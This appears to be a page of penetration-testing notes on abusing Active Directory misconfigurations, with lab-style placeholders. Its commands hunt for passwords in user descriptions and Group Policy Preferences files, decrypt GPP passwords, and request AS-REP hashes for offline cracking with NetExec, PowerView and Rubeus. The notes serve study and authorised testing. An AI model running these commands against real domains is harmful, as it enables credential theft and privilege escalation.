Skip to main content

Misconfigurations Abuse

PrivExchange

Printer Bug (MS-RPRN Abuse)

MS14-068

Sniffing LDAP Credentials

Enumerating DNS Records

adidnsdump: Active Directory Integrated DNS dumping by any authenticated user

adidnsdump -u rezydev\\jethalal ldap://10.10.10.10
## This generates .csv file.
## -r flag attempts to resolve unknown records by A query

More * 2

Password in Description Field

## Using PowerView
Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

We can also use NetExec/CrackMapExec's module to hunt for interesting looking descriptions:

# For ldap we need FQDN
nxc ldap dc01.rezydev.local -u rezydev -p Coolpass123@ -M user-desc

# Note: After description, the log files are automatically saved to log file.

# To find out what keywords it uses use following find command to get location of
# source code
find / -type f -name "user_description.py" 2>/dev/null

# Then cat and grep to find keywords
cat /usr/lib/python3/dist-packages/cme/modules/user_description.py | grep keywords

# Output:
# self.keywords = {'pass', 'creds', 'creden', 'key', 'secret', 'default'}

# We can also use module options to add custom keywords
nxc ldap dc01.rezydev.local -u rezydev -p Coolpass123@ -M user-desc -o KEYWORDS=pwd,admin

PASSWD_NOTREQD Field

## Using PowerView
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Group Policy Preferences (GPP) Passwords

ls \\dc01\SYSVOL\REZYDEV.LOCAL\scripts # Credentials in SMB Shares and SYSVOL Scripts

When a Group Policy is created with preferences like mapped drives or local admin accounts, passwords were stored in SYSVOL, accessible to all domain users. These passwords were encrypted with a weak key that was publicly known. Attackers could easily extract and decrypt them to gain elevated access. Attackers could easily extract and decrypt them using tools like gpp-decrypt to gain elevated access.

gpp-decrypt <CPASSWORD-VALUE>

Locating & Retrieving GPP Password

# Retrieves plaintext passwords and account info from Group Policy Preferences (GPP).
# Groups.xml
nxc smb 10.10.10.10 -u rezydev -p Password123@ -M gpp_password

# Searches for registry.xml on the Domain Controller to extract autologin credentials in plaintext.
# Registry.xml
nxc smb 10.10.10.10 -u rezydev -p Password123@ -M gpp_autologin

# If we get 'NetBIOSTimeout' error, use '--smb-timeout 120'.

# Once found, use nxc/cme to validate if the credentials are still valid.

ASREPRoasting

ASREPRoasting is an attack targeting Kerberos pre-authentication in Active Directory. If a user does not require pre-authentication, an attacker can request a Ticket Granting Ticket (TGT) and receive an encrypted response. This response can be brute-forced offline using tools like hashcat to recover weak passwords.

We can use PowerView or the built-in Active Directory module to enumerate users with the UAC value set to DONT_REQ_PREAUTH. If a user have GenericWrite or GenericAll permissions over an account, we can modify its settings to disable pre-authentication and perform ASREPRoasting.

Enumerating for DONT_REQ_PREAUTH

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Search for ASREPRoastable Accounts

# Bruteforce Method (No Credentials)
nxc ldap dc01.rezydev.local -u usernames.txt -p '' --asreproast asrepoutput.txt

# Credentialed Method
nxc ldap dc01.rezydev.local -u 'rezydev' -p 'Coolpass123@' --asreproast asrepoutput.txt

# Hashcat Module '18200' to crack the hash.

Retrieve the AS-REP

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Group Policy Object (GPO) Abuse

Enumerate GPOs

# Using PowerView
Get-DomainGPO | select displayname

# LOTL
Get-GPO -All | Select DisplayName

# Domain User GPO Rights
$sid = Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

# Converting GPO GUID to Name
Get-GPO -Guid <GPO-GUID>
info

We can also use BloodHound to enumerate easily.